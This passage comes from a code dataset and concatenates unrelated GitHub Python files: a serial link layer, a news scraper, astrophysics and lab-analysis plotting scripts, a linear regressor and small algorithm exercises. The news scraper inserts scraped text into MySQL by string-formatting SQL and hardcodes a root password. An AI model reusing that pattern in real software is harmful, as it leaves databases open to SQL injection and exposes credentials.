[stop_id[i],stop_name[i],stop_lat[i],stop_lon[i],location_type[i],stop_timezone[i]]\n\n'''\nprint(stop)\n'''","repo_name":"dafaqSTEVEN/Kivy","sub_path":"stop.py","file_name":"stop.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73863267111","text":"import time\n\nfrom lib.enlace.RX import RX\nfrom lib.enlace.TX import TX\nfrom lib.interface.Interface import Interface\n\n\nclass Enlace:\n def __init__ (self, interface:Interface):\n self.interface = interface\n self.rx = RX(self.interface)\n self.tx = TX(self.interface)\n\n\n def enable (self):\n self.interface.open()\n time.sleep(0.1)\n self.rx.enable()\n self.tx.enable()\n\n\n def disable (self):\n self.rx.disable()\n self.tx.disable()\n time.sleep(0.1)\n self.interface.close()\n\n\n def clear (self):\n self.rx.clear()\n self.tx.clear()\n\n\n def transmit (self, data:bytes) -> None:\n self.tx.transmit(data)\n\n\n def receive (self, size:int=-1, timeout:int=-1) -> bytes:\n try:\n return self.rx.receive(size, timeout)\n except RX.TimeoutException as error:\n raise Enlace.TimeoutException(error.time)\n\n\n class TimeoutException (RX.TimeoutException):\n \"\"\"Couldn't receive the amount requested bytes within the timeout.\n \"\"\"\n pass\n","repo_name":"FelixLuciano/P2P-UART-Serialization","sub_path":"src/lib/enlace/Enlace.py","file_name":"Enlace.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4964733070","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport requests\nimport json\nimport pymysql\n\nfrom test1 import GetNewsDetail\ndef parseListLinks(url):\n newsdetails=[]\n res=requests.get(url)\n jd=json.loads(res.text)\n for ent in jd['result']['data']:\n newsdetails.append(GetNewsDetail(ent['url']))\n return newsdetails\n#print(parseListLinks('http://api.roll.news.sina.com.cn/zt_list?channel=news&cat_1=gnxw&cat_2==gdxw1||=gatxw||=zs-pl||=mtjj&level==1||=2&show_ext=1&show_all=1&show_num=22&tag=1&format=json&page=1'))\nurl='http://api.roll.news.sina.com.cn/zt_list?channel=news&cat_1=gnxw&cat_2==gdxw1||=gatxw||=zs-pl||=mtjj&level==1||=2&show_ext=1&show_all=1&show_num=22&tag=1&format=json&page={}'\nnews_total=[]\nfor i in range(1,30):\n newsurl=url.format(i)\n newsary=parseListLinks(newsurl)\n news_total.extend(newsary)\n\n\n# 连接数据库\nconnect = pymysql.Connect(\n host='localhost',\n port=3306,\n user='root',\n password='0511',\n database='test',\n charset='utf8'\n)\n\nfor i in range(len(news_total)):\n cursor = connect.cursor()\n sql = \"INSERT INTO test ( article, comments,dt,editor,source,title) VALUES ( '%s', %d,'%s','%s','%s','%s' )\"\n data = ( news_total[i]['article'], news_total[i]['comments'],news_total[i]['dt'],news_total[i]['editor'], news_total[i]['source'],news_total[i]['title'])\n cursor.execute(sql % data)\n connect.commit()\nprint('成功插入', cursor.rowcount, '条数据')\n# 关闭连接\ncursor.close()\nconnect.close()","repo_name":"mycly/sina","sub_path":"test/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"179379176","text":"# -*- coding: utf-8 -*-\n# @Author: lshuns\n# @Date: 2023-04-02 17:20:20\n# @Last Modified by: lshuns\n# @Last Modified time: 2023-05-09 17:27:15\n\n### the relative uncertainties in galaxy morphology\n\n\nimport os\n\nimport pandas as pd \nimport numpy as np \n\nimport matplotlib as mpl\nmpl.rcParams['xtick.direction'] = 'in'\nmpl.rcParams['ytick.direction'] = 'in'\nmpl.rcParams['xtick.top'] = True\nmpl.rcParams['ytick.right'] = True\n\nimport matplotlib.pyplot as plt\n\nfrom matplotlib.ticker import AutoMinorLocator, LogLocator, NullFormatter, NullLocator\n\n########## general info\n\n# plot properties\n# outpath = 'show'\noutpath = './plots/morphology_error.pdf'\nFIGSIZE = [12, 12]\nfont_size = 16\nusetex = True\nMS = 4\n# font size\nplt.rc('font', size=font_size)\n# tex\nplt.rcParams[\"text.usetex\"] = usetex\nplt.rcParams['font.family'] = 'serif'\n\nif outpath != 'show':\n backend_orig = plt.get_backend()\n plt.switch_backend(\"agg\")\n# how many sub-plots\nfig, axs = plt.subplots(3, 3, sharex=False, sharey=False, figsize=FIGSIZE)\n\n# morphology columns\nskills_cols = ['Re_arcsec', 'BA', 'shape/sersic_n']\ncosmos_cols = ['RE_GALFIT_HI', 'BA_GALFIT_HI', 'N_GALFIT_HI']\nerr_cols = ['REERR_GALFIT_HI', 'BAERR_GALFIT_HI', 'NERR_GALFIT_HI']\ndm_label_names = ['size', 'q', 'n']\n\n# binning info for morphology columns\nnbins = 40\nloc_legend = None\nXLABEL_h_list = ['half-light radius (arcsec)', 'axis ratio', r'S\\'ersic index']\nXRANGE_h_list = [[0.05, 2], [0.05, 0.9], [0.6, 5.9]]\nxlog_list = [True, False, False]\n\n# magnitude columns\ncosmos_mag = 'r_mag_auto'\nskills_mag = 'r_SDSS_apparent_corr'\n\n########## COSMOS data catalogue\ninpath = '/disks/shear10/ssli/ImSim/input/COSMOS_cata/cosmos_shape_z_uBVriZYJHKs.feather'\ncosmos_cata = pd.read_feather(inpath)\nprint('COSMOS ori', len(cosmos_cata))\n### select\n###### 0. discard too small or too big galaxies\nmask_re = (cosmos_cata['RE_GALFIT_HI']>=1e-2) & (cosmos_cata['RE_GALFIT_HI']<=10.)\n###### 1. good shape\nmask_galfit = (cosmos_cata['FLAG_GALFIT_HI']==0)\n###### 2. has magnitude\nmask_mag = (cosmos_cata['r_mag_auto']>0)\n### apply\ncosmos_cata = cosmos_cata[mask_galfit & mask_re & mask_mag]\ndel mask_galfit, mask_re\ncosmos_cata.reset_index(drop=True, inplace=True)\nprint('COSMOS selected', len(cosmos_cata))\n### selected used columns\ncosmos_cata = cosmos_cata[cosmos_cols+err_cols+[cosmos_mag]]\n\n########## SKiLLS mock catalogue\ninpath = '/disks/shear10/ssli/ImSim/input/SURFS_cata/skills_v07Ds_input_part0_shifted.feather'\nskills_cata = pd.read_feather(inpath)\n\n########## dm files\nindir_tmp = '/net/grecht/data2/ssli_files/Projects/Projects/8ShearBias_ImSim/MultiBand_ImSim/sensitivity_test/galaxy/results'\ninpath_dm_list = [[os.path.join(indir_tmp, f'dm_ZBbins_skills_v07D7_{label}U_nogold_reweighted.csv'), \n os.path.join(indir_tmp, f'dm_ZBbins_skills_v07D7_{label}D_nogold_reweighted.csv')]\n for label in dm_label_names]\nCOLORs_dm = ['darkred', 'darkblue']\nLABELs_dm = ['shift up', 'shift down']\n\n########## 1. the relation between the mag and relative error\ni_row = 0\nXLABEL = r'$r$-band magnitude'\nYLABEL = 'Relative uncertainties'\n\nXRANGE = [22.2, 25.4]\nYRANGE = [0.01, 0.13]\n\nfor i_col, cosmos_col in enumerate(cosmos_cols):\n\n err_col = err_cols[i_col]\n\n ax = axs[i_row, i_col]\n\n ## data\n test_df = pd.DataFrame({'xval': cosmos_cata[cosmos_mag].values,\n 'yval': cosmos_cata[err_col].values/cosmos_cata[cosmos_col].values})\n # group \n Ngroup = 10\n test_df.loc[:, 'bin'] = pd.qcut(test_df['xval'].values, Ngroup, labels=False)\n # get the median\n test_df_median = test_df.groupby('bin').median()\n ax.errorbar(test_df_median['xval'].values, test_df_median['yval'].values, \n color='k', linestyle='--', marker='o', markersize=MS)\n\n # the labels\n ax.set_xlabel(XLABEL)\n if i_col == 0:\n ax.set_ylabel(YLABEL)\n\n # some general setting\n ax.xaxis.set_minor_locator(AutoMinorLocator())\n ax.yaxis.set_minor_locator(AutoMinorLocator())\n ax.set_xlim(XRANGE[0], XRANGE[1])\n ax.set_ylim(YRANGE[0], YRANGE[1])\n\n########## 2. the distribution \ni_row = 1\n\nYLABEL = 'Probability density'\n\n# 0, 1, 2\nCOLORs = ['k', 'darkred', 'darkblue']\nLINEs = ['solid', 'solid', 'solid']\nLWs = [1, 1, 1]\nLABELs = ['fiducial', 'shift up', 'shift down']\n\nfor i_col, skills_col in enumerate(skills_cols):\n\n ax = axs[i_row, i_col]\n\n xlog = xlog_list[i_col]\n XRANGE = XRANGE_h_list[i_col]\n XLABEL = XLABEL_h_list[i_col]\n\n # the fiducial\n para = skills_cata[skills_col].values\n if xlog:\n logbins = np.logspace(np.log10(XRANGE[0]), np.log10(XRANGE[1]), nbins)\n ax.hist(x=para, \n bins=logbins, \n range=XRANGE,\n density=True, \n color=COLORs[0], \n label=LABELs[0], \n alpha=0.3, \n linestyle=LINEs[0],\n linewidth=LWs[0])\n else:\n ax.hist(x=para, \n bins=nbins, \n range=XRANGE,\n density=True, \n color=COLORs[0], \n label=LABELs[0], \n alpha=0.3, \n linestyle=LINEs[0],\n linewidth=LWs[0])\n\n # the up\n para = skills_cata[f'{skills_col}_U'].values\n if xlog:\n logbins = np.logspace(np.log10(XRANGE[0]), np.log10(XRANGE[1]), nbins)\n ax.hist(x=para, \n bins=logbins, \n range=XRANGE,\n density=True, \n color=COLORs[1], \n label=LABELs[1], \n histtype='step', \n linestyle=LINEs[1],\n linewidth=LWs[1])\n else:\n ax.hist(x=para, \n bins=nbins, \n range=XRANGE,\n density=True, \n color=COLORs[1], \n label=LABELs[1], \n histtype='step', \n linestyle=LINEs[1],\n linewidth=LWs[1])\n\n # the down\n para = skills_cata[f'{skills_col}_D'].values\n if xlog:\n logbins = np.logspace(np.log10(XRANGE[0]), np.log10(XRANGE[1]), nbins)\n ax.hist(x=para, \n bins=logbins, \n range=XRANGE,\n density=True, \n color=COLORs[2], \n label=LABELs[2], \n histtype='step', \n linestyle=LINEs[2],\n linewidth=LWs[2])\n else:\n ax.hist(x=para, \n bins=nbins, \n range=XRANGE,\n density=True, \n color=COLORs[2], \n label=LABELs[2], \n histtype='step', \n linestyle=LINEs[2],\n linewidth=LWs[2])\n\n if xlog:\n ax.set_xscale('log')\n\n # the labels\n ax.set_xlabel(XLABEL)\n if i_col == 0:\n ax.set_ylabel(YLABEL)\n\n ax.set_xlim(XRANGE[0], XRANGE[1])\n\n if i_col==2:\n ax.legend(frameon=True, loc=loc_legend)\n\n########## 3. the dm\ni_row = 2\n\nXRANGE = [-0.009, 0.009]\nXLABEL = r\"$\\Delta m$\"\nYTICK = [1, 2, 3, 4, 5]\nbinvalue = np.array(YTICK)\nYTICKLABELS = [r'$0.1< z_{\\rm B} \\leq 0.3$', \n r'$0.3< z_{\\rm B} \\leq 0.5$', \n r'$0.5< z_{\\rm B} \\leq 0.7$', \n r'$0.7< z_{\\rm B} \\leq 0.9$', \n r'$0.9< z_{\\rm B} \\leq 1.2$']\nYLIM = [0.5, 5.5]\n\nfor i_col, inpath_list_tmp in enumerate(inpath_dm_list):\n\n ax = axs[i_row, i_col]\n\n # get values and plot\n Npoints = len(inpath_list_tmp)\n for i_val, inpath in enumerate(inpath_list_tmp):\n try:\n data = pd.read_csv(inpath)\n except FileNotFoundError:\n continue\n\n # the first row is for whole\n mvalue = (data.loc[1:, 'm1'].values + data.loc[1:, 'm2'].values) / 2.\n print('dm value', mvalue)\n # error\n merror = (data.loc[1:, 'm1_err'].values + data.loc[1:, 'm2_err'].values) / 2.\n print('dm error', merror)\n del data\n\n ax.errorbar(mvalue, binvalue + (i_val-Npoints/2.) * 0.1, xerr=merror,\n color=COLORs_dm[i_val], marker='o', markersize=4, elinewidth=1.5, \n ls='none', label=LABELs_dm[i_val])\n\n for ibin in range(5):\n ax.axhline(y=1.5+ibin, color='black', ls='-', lw=1)\n\n ax.axvline(x=0.0, ls='dotted', label=None, color='k', linewidth=1.5)\n\n if i_col == 0:\n ax.set_yticks(ticks=YTICK, labels=YTICKLABELS)\n else:\n ax.set_yticks([])\n\n ax.tick_params(axis='y', length=0, width=0)\n\n ax.set_xlim(XRANGE[0], XRANGE[1])\n ax.set_ylim(YLIM[0], YLIM[1])\n ax.set_xlabel(XLABEL)\n\n # invert y-axis\n ax.invert_yaxis()\n\nif outpath == 'show':\n plt.show()\n plt.close()\nelse:\n plt.savefig(outpath, dpi=300)\n plt.close()\n plt.switch_backend(backend_orig)\n print(\"plot saved as\", outpath) \n","repo_name":"lshuns/CSK1000LF321","sub_path":"paper_plot/Figg_C1_morphology_error.py","file_name":"Figg_C1_morphology_error.py","file_ext":"py","file_size_in_byte":8604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8223673543","text":"\nimport sys\nsys.path.insert(1, '/home/testaovo/Scrivania/LABORATORIO/TOF/Lab_TOF')\n\nimport argparse \nimport numpy\nimport matplotlib.pyplot as plt\nfrom scipy.stats import pearsonr\nfrom matplotlib.colors import LogNorm\n\nimport fit_functions\nimport plot_functions\nimport geometry\nimport analysis_functions\nimport utilities\n\n\nif __name__ == '__main__' : \n\n m, dm , costant, tau_diff = utilities.read_parameter('vs_x/T13_T23_vs_x.txt', 'vs_x/Tsum_Tdiff_vs_x.txt') \n bias_tof = 2.342\n \n input_file = 'dati/Run47.dat' \n t, ch0, ch1 = numpy.loadtxt(input_file, unpack = True)\n utilities.rate_and_saturation(t, ch0, ch1)\n t_run = utilities.acquisition_duration(t)\n T13, T23 = utilities.TAC_scale(ch0, ch1) \n mask = (T23 > 1.) * (T13 > 1.) * (T23 < 65.) * (T13 < 65.)\n T13 = T13[mask]\n T23 = T23[mask]\n info_run = '%d eventi, %d secondi' % (len(T13), t_run) \n\n \n input_data_file_pb = 'dati/Run57.dat'\n t, ch0, ch1 = numpy.loadtxt(input_data_file_pb, unpack = True)\n utilities.rate_and_saturation(t, ch0, ch1)\n T13_pb, T23_pb = utilities.TAC_scale(ch0, ch1) \n t_run_pb = utilities.acquisition_duration(t)\n mask = (T23_pb > 1.) * (T13_pb > 1.) * (T23_pb < 65.) * (T13_pb < 65.)\n T13_pb = T13_pb[mask]\n T23_pb = T23_pb[mask]\n figlabel = '_run_pb' \n info_run_pb = '%d eventi, %d secondi' % (len(T13_pb), t_run_pb) \n\n\n input_data_file_pb2 = 'dati/Run67.dat'\n t, ch0, ch1 = numpy.loadtxt(input_data_file_pb2, unpack = True)\n utilities.rate_and_saturation(t, ch0, ch1)\n T13_pb2, T23_pb2 = utilities.TAC_scale(ch0, ch1) \n t_run_pb2 = utilities.acquisition_duration(t)\n mask = (T23_pb2 > 1.) * (T13_pb2 > 1.) * (T23_pb2 < 65.) * (T13_pb2 < 65.)\n T13_pb2 = T13_pb2[mask]\n T23_pb2 = T23_pb2[mask]\n info_run_pb2 = '%d eventi, %d secondi' % (len(T13_pb2), t_run_pb2) \n\n print(\"info run47: %s\" % info_run)\n print(\"info run57: %s\" % info_run_pb) \n print(\"info run57: %s\" % info_run_pb2) \n\n TOF = analysis_functions.TOF(T13, T23, costant) \n TOF = TOF + bias_tof\n T12 = analysis_functions.T12(T13, T23, tau_diff)\n x = analysis_functions.x(T12, m) \n l = analysis_functions.l(x, geometry.h_13_long * 100, geometry.s3 * 100) \n beta = analysis_functions.beta(l, geometry.h_13_long * 100, TOF) \n #plot_functions.hist2d(TOF, l, \"TOF [ns]\", \"l[cm]\", bins=None, range_x = (-10., 20.), range_y = (170., 270.), norm = LogNorm())\n\n TOF_pb = analysis_functions.TOF(T13_pb, T23_pb, costant) \n TOF_pb = TOF_pb + bias_tof\n T12_pb = analysis_functions.T12(T13_pb, T23_pb, tau_diff)\n x_pb = analysis_functions.x(T12_pb, m ) \n l_pb = analysis_functions.l(x_pb, geometry.h_13_long * 100, geometry.s3 * 100) \n beta_pb = analysis_functions.beta(l_pb, geometry.h_13_long * 100, TOF_pb ) \n #plot_functions.hist2d(TOF_pb, l_pb, \"TOF [ns]\", \"l[cm]\", bins=None, range_x = (-10., 20.), range_y = (170., 270.), norm = LogNorm())\n\n \n TOF_pb2 = analysis_functions.TOF(T13_pb2, T23_pb2, costant) \n TOF_pb2 = TOF_pb2 + bias_tof\n T12_pb2 = analysis_functions.T12(T13_pb2, T23_pb2, tau_diff)\n x_pb2 = analysis_functions.x(T12_pb2, m ) \n l_pb2 = analysis_functions.l(x_pb2, geometry.h_13_long * 100, geometry.s3 * 100) \n beta_pb2 = analysis_functions.beta(l_pb2, geometry.h_13_long * 100, TOF_pb2 ) \n #plot_functions.hist2d(TOF_pb2, l_pb2, \"TOF [ns]\", \"l[cm]\", bins=None, range_x = (-10., 20.), range_y = (170., 270.), norm = LogNorm()) \n \n \n\n\n plot_functions.three_histogram_data(beta, beta_pb, beta_pb2, \"beta\", \"a.u.\", bins = None, range = (0., 2.), density = False, title = '', labelx = 'senza piombo', labely = '7 spessori', labelz='4 spessori')\n\n plt.ion()\n plt.show()\n","repo_name":"eleravera/Lab_TOF","sub_path":"Analysis/pb_histogram.py","file_name":"pb_histogram.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2085731156","text":"\"\"\"\n CS102 - Programming Assignment 6\n 15.4 - Sum series\n Sean X.\n Monday Nov. 29, 2021\n\n Summary\n This program will compute a formula described in the docstring of the compute function.\n It includes a format fraction helper to convert a fraction to a string.\n\"\"\"\nfrom fractions import Fraction\nfrom typing import Callable\n\n\ndef compute(i: int) -> Fraction:\n \"\"\"Compute using the formula in the description\n\n Compute with the variable i, this formula:\n 1 + ½ + ⅓ + ¼ + ... + ¹⁄ᵢ\n\n Args:\n i: The variable i in the formula\n\n Returns:\n The computed result of the formula\n \"\"\"\n\n return 1 + compute_helper(2, Fraction(0, 1), i + 1)\n\n\ndef compute_helper(i: int, cur: Fraction, target: int) -> Fraction:\n return cur if i == target else compute_helper(i + 1, cur + Fraction(1, i), target)\n\n\ndef format_fraction(fraction: Fraction) -> str:\n \"\"\"Format the fraction with Unicode super/subscript numbers\n\n Args:\n fraction: The fraction to format\n\n Returns:\n The formatted fraction\n \"\"\"\n\n # fmt: off\n symbols: dict[str, dict[int, str] | str] = {\n \"numerator\": {\n 0: \"⁰\", 1: \"¹\", 2: \"²\",\n 3: \"³\", 4: \"⁴\", 5: \"⁵\",\n 6: \"⁶\", 7: \"⁷\", 8: \"⁸\",\n 9: \"⁹\",\n },\n \"denominator\": {\n 0: \"₀\", 1: \"₁\", 2: \"₂\",\n 3: \"₃\", 4: \"₄\", 5: \"₅\",\n 6: \"₆\", 7: \"₇\", 8: \"₈\",\n 9: \"₉\",\n },\n \"slash\": \"⁄\",\n }\n # fmt: on\n\n # Get the whole number part of the fraction as a mixed number\n number: int = fraction.numerator // fraction.denominator\n # Get the left over numerator after making it a mixed number\n remainder: int = fraction.numerator - number * fraction.denominator\n # Make each digit in a number into the super/subscript version of it.\n # I convert it into a string, make it into a list of each char\n # and get the super/subscript version.\n subSupScript: Callable[[int, str], str] = lambda n, l: \"\".join(\n symbols[l][int(s)] for s in list(str(n))\n )\n\n return f\"{number}{subSupScript(remainder, 'numerator')}{symbols['slash']}{subSupScript(fraction.denominator, 'denominator')}\"\n","repo_name":"sean-7777/CS102","sub_path":"Week6/Discussion/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36004635087","text":"#script for testing out a kdtree algorithm using freecad kdtrees\n\nimport sys\nimport numpy as np\nfrom scipy.spatial import KDTree\nFreeCADPath = '/usr/lib/freecad-daily-python3/lib'\nsys.path.append(FreeCADPath)\nimport FreeCAD\nimport Mesh\nfrom scipy import spatial\n\n\n#file = '/home/tom/source/test/raysect/cube.stl'\n#file = '/home/tom/source/test/raysect/cube1mm.stl'\n#file = '/home/tom/HEAT/data/NSTX/STLs/T000___3.0mm.stl'\n#file = '/home/tom/HEAT/data/NSTX/STLs/narrowSlice___standardmm.stl'\nfile = '/home/tom/HEAT/data/NSTX/STLs/narrowSlice001___standardmm.stl'\nmesh = Mesh.Mesh(file)\n\n\n#rayOrig = np.array([50.0, -100.0, 50.0])\n#rayTerm = np.array([40.0, 500.0, 50.0])\nrayOrig = np.array([604.928, 0, -1609.06])\nrayTerm = np.array([604.985, 10.56, -1608.35])\n\n\n#triangle = np.asarray(mesh.Facets[0].Points)\n#face centers\n#rayOrig = np.zeros((3))\n#rayOrig[0] = np.sum(triangle[:,0])/3.0\n#rayOrig[1] = np.sum(triangle[:,1])/3.0\n#rayOrig[2] = np.sum(triangle[:,2])/3.0\n#rayTerm = np.asarray(mesh.Facets[0].Normal)\n\n\nrayVec = rayTerm - rayOrig\nrayDist = np.linalg.norm(rayVec)\nrayDir = rayVec / rayDist\n\n#=== Using toroidal angle filter\ndef xyz2cyl(x,y,z):\n \"\"\"\n Converts x,y,z coordinates to r,z,phi\n \"\"\"\n x = np.asarray(x)\n y = np.asarray(y)\n z = np.asarray(z)\n r = np.sqrt(x**2 + y**2)\n phi = np.arctan2(y,x)\n #phi = np.radians(phi)\n return r,z,phi\n\n\nq1 = np.array([rayOrig])\nq2 = np.array([rayTerm])\ni=0\n\ntargetPoints = []\nfor face in mesh.Facets:\n targetPoints.append(face.Points)\n\ntargetPoints = np.asarray(targetPoints)/1000.0 #scale to m\np1 = targetPoints[:,0,:] #point 1 of mesh triangle\np2 = targetPoints[:,1,:] #point 2 of mesh triangle\np3 = targetPoints[:,2,:] #point 3 of mesh triangle\n#Prepare for toroidal angle filtering\nR,Z,phi = xyz2cyl(p1[:,0],p1[:,1],p1[:,2])\nphiP1 = phi\nR,Z,phi = xyz2cyl(p2[:,0],p2[:,1],p2[:,2])\nphiP2 = phi\nR,Z,phi = xyz2cyl(p3[:,0],p3[:,1],p3[:,2])\nphiP3 = phi\n\n#filter by toroidal angle\nR,Z,phi = xyz2cyl(q1[i,0],q1[i,1],q1[i,2])\nphiMin = phi\nR,Z,phi = xyz2cyl(q2[i,0],q2[i,1],q2[i,2])\nphiMax = phi\n\n#target faces outside of this toroidal slice\ntest0 = np.logical_and(phiP1 < phiMin, phiP2 < phiMin, phiP3 < phiMin)\ntest1 = np.logical_and(phiP1 > phiMax, phiP2 > phiMax, phiP3 > phiMax)\ntest = np.logical_or(test0,test1)\nuse = np.where(test == False)[0]\n\n\n\n\n#np.logical_and(phiP1 > phiMin, phiP2 < phiMax)\n#np.logical_and(phiP2 > phiMin, phiP2 < phiMax)\n#np.logical_and(phiP3 > phiMin, phiP3 < phiMax)\n#test = np.logical_and(test1,test2,test3)\n#use = np.where(test==True)[0]\n\n\n\n\n\n\nprint(use)\n\n\n#=== using scipy.spatial.KDTree algorithm\nN_facets = mesh.CountFacets\nx = np.zeros((N_facets,3))\ny = np.zeros((N_facets,3))\nz = np.zeros((N_facets,3))\nfor i,facet in enumerate(mesh.Facets):\n #mesh points\n for j in range(3):\n x[i][j] = facet.Points[j][0]\n y[i][j] = facet.Points[j][1]\n z[i][j] = facet.Points[j][2]\n\nx = x.flatten()\ny = y.flatten()\nz = z.flatten()\nX,Y,Z = np.meshgrid(x, y, z, indexing='ij')\n\npoints = np.c_[X.ravel(), Y.ravel(), Z.ravel()]\ntree = spatial.KDTree(np.array([x,y,z]).T)\nsorted(tree.query_ball_point(rayOrig, rayDist))\n\n\n\n#=== using FreeCAD internal algorithm\n#intersect\nintersect = mesh.nearestFacetOnRay((rayOrig[0],rayOrig[1],rayOrig[2]),(rayDir[0],rayDir[1],rayDir[2]))\nidx = list(intersect.keys())[0]\nloc = list(intersect.values())[0]\nnewRay = loc - rayOrig\nprint(intersect)\n# remove self intersections\nmesh1 = mesh.copy()\nfrontFaces = np.array([21])\nmesh1.removeFacets(frontFaces)\nmesh1.nearestFacetOnRay((rayOrig[0],rayOrig[1],rayOrig[2]),(rayDir[0],rayDir[1],rayDir[2]))\n","repo_name":"plasmapotential/scratchPad","sub_path":"accelerationTests/kdTreeMesh.py","file_name":"kdTreeMesh.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7332734690","text":"import numpy as np \nfrom pandas import read_csv\nimport os\nimport time\n\n'''\nNow that this is working, I wan't to go through the documentation of np.dot() and figure out the linear algebra\nbehind how that works and implement in that way. \n'''\n\nclass simple_linear_regressor:\n\n def __init__(self, X, y, i=1000, lr=.05):\n self.features = X\n self.labels = y\n self.iterations = i\n self.weight = 2\n self.bias = 2\n self.learning_rate = lr\n self.data_length = len(self.features)\n \n def fit_model(self):\n for i in range(self.iterations):\n self.update()\n\n def predict(self, x):\n return (self.weight * x) + self.bias\n\n def weight_derivitive(self):\n derivitive = -2*self.features*(self.labels - (self.weight*self.features+self.bias))\n return np.sum(derivitive)/self.data_length\n\n def bias_derivitive(self):\n derivitive = -2*(self.labels - (self.weight*self.features+self.bias))\n return np.sum(derivitive)/self.data_length\n\n def update(self):\n self.weight = self.weight - self.learning_rate*(self.weight_derivitive())\n self.bias = self.bias - self.learning_rate*(self.bias_derivitive())\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n\n ## opening csv file\n cur_directory = os.getcwd()\n weather_path = os.path.join(cur_directory, 'regression_data', 'weatherHistory.csv')\n weather_data = read_csv(weather_path)\n #print(weather_data[:5])\n\n ## getting random distribution of desired data\n humitity_X = np.array(weather_data['Humidity'])\n temp_y = np.array(weather_data['Temperature (C)'])\n\n np.random.seed(seed=1)\n rand_indexs = np.array(np.floor(np.random.rand(150) * len(humitity_X)), 'int')\n #print(rand_indexs, '\\n')\n\n rand_X = humitity_X[rand_indexs]\n #print(rand_X[:3], '\\n')\n\n rand_y = temp_y[rand_indexs]\n #print(rand_y[:3], '\\n')\n\n ## Visualizing the data\n plt.scatter(rand_X, rand_y, color = 'red')\n plt.plot()\n plt.title('Relationship of Humidity and Temperature')\n plt.xlabel('Humidity')\n plt.ylabel('Temperature')\n\n\n ## Using the \n start_time = time.time()\n regressor = simple_linear_regressor(rand_X, rand_y, 1500)\n regressor.weight_derivitive()\n regressor.fit_model()\n total_time = time.time() - start_time\n print(total_time)\n\n\n relavant_range = np.arange(.3, 1.1, .1)\n y_vals = relavant_range * regressor.weight + regressor.bias\n\n plt.plot(relavant_range, y_vals)\n plt.show()\n print(f'{regressor.weight}x + {regressor.bias}')\n","repo_name":"nairod2000/regressors","sub_path":"linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12725579618","text":"'''\nQuestion: Find if value exists in BST\n\nTime complexity: O(log n) - depth of the node\n'''\n\nimport sys\nsys.path.append(\"./mylib\")\nimport BST\n\n#Create BST\nroot = BST.BSTNode(4)\ninput = [3,2,1,5,10,7,6,9,15]\nfor x in input:\n BST.insertNode(root, BST.BSTNode(x))\n\n\n\n\ndef BSTSearch(root,K):\n if(root is None):\n return False\n elif (root.data > K): \n return(BSTSearch(root.left,K))\n elif (root.data < K):\n return(BSTSearch(root.right,K))\n else:\n return True\n \ninput2 = [15,3,0] \nfor K in input2:\n print(\"%d exist: %s\" % (K,BSTSearch(root,K)))\n","repo_name":"AugustLONG/Code","sub_path":"CC150Python/challenges-masterCC50-Python-good/binary-search-tree-find-value.py","file_name":"binary-search-tree-find-value.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26216906091","text":"# https://leetcode.com/problems/count-special-quadruplets/\n# 1AC, not quite efficient\nfrom collections import defaultdict\nfrom copy import deepcopy\n\nclass Solution:\n def countQuadruplets(self, nums: List[int]) -> int:\n n = len(nums)\n m2 = [defaultdict(int)]\n for i in range(1, n):\n m2.append(deepcopy(m2[-1]))\n for j in range(i):\n m2[-1][nums[i] + nums[j]] += 1\n\n res = 0\n for i in range(3, n):\n for j in range(2, i):\n dt = nums[i] - nums[j]\n if dt in m2[j - 1]:\n res += m2[j - 1][dt]\n return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/1501-2000/1995_count-special-quadruplets_1_AC.py","file_name":"1995_count-special-quadruplets_1_AC.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"447039650","text":"\"\"\"\nImplementation of base Sentinel Hub interfaces\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Any\n\nfrom ..base import DataRequest\nfrom ..constants import MimeType, MosaickingOrder, RequestType, ResamplingType\nfrom ..data_collections import DataCollection, OrbitDirection\nfrom ..download import DownloadRequest\nfrom ..geometry import BBox, Geometry\nfrom ..time_utils import RawTimeIntervalType, parse_time_interval, serialize_time\nfrom .utils import _update_other_args\n\n\nclass SentinelHubBaseApiRequest(DataRequest, metaclass=ABCMeta):\n \"\"\"A base class for Sentinel Hub interfaces\"\"\"\n\n _SERVICE_ENDPOINT = \"\"\n payload: dict[str, Any] = {} # noqa: RUF012\n\n @property\n @abstractmethod\n def mime_type(self) -> MimeType:\n \"\"\"The mime type of the request.\"\"\"\n\n def create_request(self) -> None:\n \"\"\"Prepares a download request\"\"\"\n headers = {\"content-type\": MimeType.JSON.get_string(), \"accept\": self.mime_type.get_string()}\n base_url = self._get_base_url()\n self.download_list = [\n DownloadRequest(\n request_type=RequestType.POST,\n url=f\"{base_url}/api/v1/{self._SERVICE_ENDPOINT}\",\n post_values=self.payload,\n data_folder=self.data_folder,\n save_response=bool(self.data_folder),\n data_type=self.mime_type,\n headers=headers,\n use_session=True,\n )\n ]\n\n @staticmethod\n def input_data(\n data_collection: DataCollection,\n *,\n identifier: str | None = None,\n time_interval: RawTimeIntervalType | None = None,\n maxcc: float | None = None,\n 